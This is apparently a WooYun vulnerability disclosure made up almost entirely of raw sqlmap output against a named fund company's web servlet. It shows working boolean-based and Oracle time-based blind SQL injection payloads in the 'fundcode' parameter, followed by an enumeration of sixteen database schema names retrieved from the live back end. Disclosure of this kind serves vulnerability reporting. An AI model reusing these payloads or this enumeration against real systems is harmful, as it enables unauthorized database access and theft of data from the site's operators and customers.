WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: fundcode
    Type: #1*
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://nffund.com:80/QueryFundSylServlet?fundcode=160134' AND 3617=3617 AND 'WDBf'='WDBf&date=201
4-12-09
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://nffund.com:80/QueryFundSylServlet?fundcode=160134' AND 7068=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
74)||CHR(81)||CHR(115)||CHR(119),5) AND 'sJqA'='sJqA&date=2014-12-09
---
[08:17:44] [INFO] the back-end DBMS is Oracle
web application technology: Apache, Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
[08:17:44] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to databas
e names on other DBMSes
[08:17:44] [INFO] fetching database (schema) names
[08:17:44] [INFO] fetching number of databases
[08:17:44] [INFO] resumed: 16
[08:17:44] [INFO] retrieving the length of query output
[08:17:44] [INFO] retrieved: 7
[08:17:47] [INFO] resuming partial value: CH
[08:17:54] [INFO] retrieved: CHANNEL
[08:17:54] [INFO] retrieving the length of query output
[08:17:54] [INFO] retrieved: 5
[08:18:01] [INFO] retrieved: DBMGR
[08:18:01] [INFO] retrieving the length of query output
[08:18:01] [INFO] retrieved: 6
[08:18:13] [INFO] retrieved: DBSNMP
[08:18:13] [INFO] retrieving the length of query output
[08:18:13] [INFO] retrieved: 6
[08:18:22] [INFO] retrieved: EXFSYS
[08:18:22] [INFO] retrieving the length of query output
[08:18:22] [INFO] retrieved: 5
[08:18:30] [INFO] retrieved: MDSYS
[08:18:30] [INFO] retrieving the length of query output
[08:18:30] [INFO] retrieved: 6
[08:18:38] [INFO] retrieved: MOBILE
[08:18:38] [INFO] retrieving the length of query output
[08:18:38] [INFO] retrieved: 4
[08:18:44] [INFO] retrieved: NFJJ
[08:18:44] [INFO] retrieving the length of query output
[08:18:44] [INFO] retrieved: 6
[08:18:53] [INFO] retrieved: ORDSYS
[08:18:53] [INFO] retrieving the length of query output
[08:18:53] [INFO] retrieved: 5
[08:19:01] [INFO] retrieved: OUTLN
[08:19:01] [INFO] retrieving the length of query output
[08:19:01] [INFO] retrieved: 3
[08:19:18] [INFO] retrieved: SYS
[08:19:18] [INFO] retrieving the length of query output
[08:19:18] [INFO] retrieved: 6
[08:19:28] [INFO] retrieved: SYSMAN
[08:19:28] [INFO] retrieving the length of query output
[08:19:28] [INFO] retrieved: 6
[08:19:37] [INFO] retrieved: SYSTEM
[08:19:37] [INFO] retrieving the length of query output
[08:19:37] [INFO] retrieved: 8
[08:19:46] [INFO] retrieved: THINKCMS
[08:19:46] [INFO] retrieving the length of query output
[08:19:46] [INFO] retrieved: 6
[08:19:55] [INFO] retrieved: TSMSYS
[08:19:55] [INFO] retrieving the length of query output
[08:19:55] [INFO] retrieved: 5
[08:20:03] [INFO] retrieved: WMSYS
[08:20:03] [INFO] retrieving the length of query output
[08:20:03] [INFO] retrieved: 3
[08:20:11] [INFO] retrieved: XDB
available databases [16]:
[*] CHANNEL
[*] DBMGR
[*] DBSNMP
[*] EXFSYS
[*] MDSYS
[*] MOBILE
[*] NFJJ
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] THINKCMS
[*] TSMSYS
[*] WMSYS
[*] XDB